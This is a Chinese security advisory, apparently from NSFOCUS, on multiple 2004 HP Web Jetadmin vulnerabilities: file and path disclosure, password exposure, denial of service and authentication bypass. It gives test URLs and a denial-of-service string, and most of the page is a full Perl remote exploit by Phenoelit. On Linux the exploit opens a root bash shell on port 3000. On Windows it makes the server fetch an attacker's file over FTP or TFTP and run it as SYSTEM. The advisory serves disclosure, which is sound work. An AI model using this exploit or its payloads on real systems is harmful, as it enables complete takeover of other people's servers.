安全研究
安全漏洞
HP Web Jetadmin多个安全漏洞
发布日期:2004-04-27
更新日期:2004-05-08
受影响系统:
HP Web Jetadmin 7.0描述:
HP Web Jetadmin 6.5
BUGTRAQ ID: 10224
HP Web JetAdmin具有一个整合式的修改的Apache Web服务器,可对大量HP打印机进行管理。
HP Web JetAdmin存在多个安全问题,远程攻击者可以利用这些漏洞获得敏感信息,进行拒绝服务攻击或未授权访问服务程序。
主要问题如下:
1、HTS和INC文件可泄露源代码。
2、会泄露重要文件的实际路径。
3、重要文件可通过WEB服务器访问。
4、用户和管理员密码泄露并解密。
5、用户和管理员密码重放。
6、ROOT/管理员密码泄露。
7、由于输入验证错误可导致服务器拒绝服务。
8、验证函数可绕过。
9、通过HTTP协议可直接访问服务器核心和插件。
10、字符串写入文件输入验证失败。
11、应用程序中隐藏着游戏信息。
<*来源:Phenoelit
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108016957108063&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
泄露脚本:
http://www.example.com:8000/plugins/hpjwja/script/devices_list.hts.
framework.ini文件泄露:
http://www.example.com:8000/plugins/framework/framework.ini
拒绝服务:
01010101FFFF02020202020202020202
绕过验证访问各种函数:
obj=Httpd:SetProfile(Profiles_Admin,password,$_pwd,$__framework_ini)
控制系统:
#!/usr/bin/perl
use IO::Socket;
#
# This is an exploit for HP Web JetAdmin, the printer management server from HP.
# It is NOT about printers! The service usually runs on port 8000 on Windows,
# Solaris or Linux boxes.
#
# Greetz: The Phenoelit People, c-base crew, EEyE (rock!), Halvar on the other
# side of the planet, Johnny, Andreas, Lisa, H D Moore, Nicolas
# Fishbach and all the others I forgot
#
$|=1;
die "Specify server name or IP\n" unless ($host=shift);
#
# lala stuff
#
print "Phenoelit HP Web JetAdmin 6.5 remote\n".
" Linux root and Windows NT/2000 Administrator exploit\n".
" by FX of Phenoelit\n".
" Research done at BlackHat Singapore 2002\n\n";
#
# Check version for the kiddies
#
$request="GET /plugins/hpjwja/help/about.hts HTTP/1.0\r\n\r\n";
&doit();
#
# Get the path first
#
$rs=~/--\ framework\.ini\ (.+)-->/;
$hppath=$1;
if ($hppath) { $hppath=~s/\/doc\/plugins\/framework\/framework.ini//; }
#
# Now get some more info
#
$rs=~s/[\r\n\t]//g;
$rs=~s/<\/td><td\ valign\=\"top\"\ nowrap>//g;
$rs=~/JetAdmin\ Version<\/b>([^<]+)<\/td>/;
$version=$1;
$rs=~/System\ Version<\/b>([^<]+)<\/td>/;
$system=$1;
die "It's not version 6.5 or version extraction failed\n" unless ($version=~/6\.5/);
die "Could not extract path\n" unless ($hppath);
#
# Info 2 user
#
print "HP Web JetAdmin Path: \n\t".$hppath."\n";
print "HP Web JetAdmin Version: ".$version."\n";
if ($system=~/Linux/) {
printf "Host system identified as Linux ...\n";
#
# Create file content and kick off inetd
#
$cont=
"obj=Httpd:VarCacheSet(hacked,true);".
"Httpd:ExecuteFile(/usr/sbin/,inetd,".$hppath."/cache.ini)".
"&__BrowserID=0%0a3000%20stream%20tcp%20nowait%20root%20/bin/bash%20bash%0a";
$request = "POST /plugins/framework/script/content.hts HTTP/1.0\r\n".
"Host: ".$host."\r\n".
"Accept: text/html, text/plain, application/pdf, image/*, ".
"image/jpeg, text/sgml, video/mpeg, image/jpeg, ".
"image/tiff, image/x-rgb, image/png, image/x-xbitmap,".
" image/x-xbm, image/gif, application/postscript, */*;q=0.01\r\n".
"Accept-Language: en\r\n".
"Pragma: no-cache\r\n".
"Cache-Control: no-cache\r\n".
"User-Agent: Phenoelit script\r\n".
"Referer: http://www.phenoelit.de/\r\n".
"Content-type: application/x-www-form-urlencoded\r\n".
"Content-length: ".length($cont)."\r\n\r\n".
$cont;
&doit();
print "You should now connect to $host:3000 and enjoy your root shell\n";
} elsif ($system=~/WinNT/) {
print "Target system is Windows.\n".
" Do you want file upload via FTP [f] or TFTP [t]: ";
$usersel=<STDIN>;
if ($usersel=~/^f/i) {
print "FTP used ...\n";
print "FTP Host: "; $ftph=<STDIN>; chomp($ftph);
print "FTP User: "; $ftpu=<STDIN>; chomp($ftpu);
print "FTP Pass: "; $ftpp=<STDIN>; chomp($ftpp);
print "FTP Path: "; $ftppath=<STDIN>; chomp($ftppath);
print "FTP File: "; $ftpfile=<STDIN>; chomp($ftpfile);
print "File ".$ftpfile." will be downloaded from ".$ftph.$ftppath."\n".
" with username ".$ftpu." and password ".$ftpp."\n";
$cont=
"obj=".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,open ".$ftph.",>c:\\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,".$ftpu.">>c:\\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,".$ftpp.">>c:\\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,lcd c:\\,>>c:\\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,cd ".$ftppath.",>>c:\\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,bin,>>c:\\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,get ".$ftpfile.",>>c:\\x.txt);".
"Httpd:ExecuteFile(,cmd.exe,/c,echo,quit,>>c:\\x.txt);".
"Httpd:ExecuteFile(,ftp.exe,-s:c:\\x.txt);".
"Httpd:ExecuteFile(c:\\,".$ftpfile.")";
} elsif ($usersel=~/^t/) {
print "TFTP used ...\n";
print "TFTP Host: "; $ftph=<STDIN>; chomp($ftph);
print "TFTP Path: "; $ftppath=<STDIN>; chomp($ftppath);
print "TFTP File: "; $ftpfile=<STDIN>; chomp($ftpfile);
$ftppath.="/" unless ($ftppath=~/\/$/);
$cont=
"obj=".
"Httpd:ExecuteFile(,tftp.exe,-i,".$ftph.",GET,".
$ftppath.$ftpfile.",c:\\".$ftpfile.");".
"Httpd:ExecuteFile(c:\\,".$ftpfile.")";
} else {
print "Wurstfinger ?\n";
exit 0;
}
$request = "POST /plugins/framework/script/content.hts HTTP/1.0\r\n".
"Host: ".$host."\r\n".
"Accept: text/html, text/plain, application/pdf, image/*, ".
"image/jpeg, text/sgml, video/mpeg, image/jpeg, ".
"image/tiff, image/x-rgb, image/png, image/x-xbitmap,".
" image/x-xbm, image/gif, application/postscript, */*;q=0.01\r\n".
"Accept-Language: en\r\n".
"Pragma: no-cache\r\n".
"Cache-Control: no-cache\r\n".
"User-Agent: Phenoelit script\r\n".
"Referer: http://www.phenoelit.de/\r\n".
"Content-type: application/x-www-form-urlencoded\r\n".
"Content-length: ".length($cont)."\r\n\r\n".
$cont;
print "If everything works well, the specified file should be running\n".
" soon in SYSTEM context. Don't stop this script until your program\n".
" terminates. Enjoy the box.\n";
&doit();
} else {
print "Host OS (".$system.") not supported by exploit - modify it\n";
}
exit 0;
sub doit {
$remote =
IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort=>"8000",);
die "cannot connect to http daemon on $host\n" unless($remote);
$remote->autoflush(1);
print $remote $request;
$rs="";
while ( $rline=<$remote> ) {
$rs.=$rline;
#print $rline;
}
close $remote;
}
建议:
厂商补丁:
HP
--
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://h10010.www1.hp.com/wwpc-JAVA/offweb/vac/us/en/en/network_software/wja_overview.html
浏览次数:3067
严重程度:0(网友投票)
绿盟科技给您安全的保障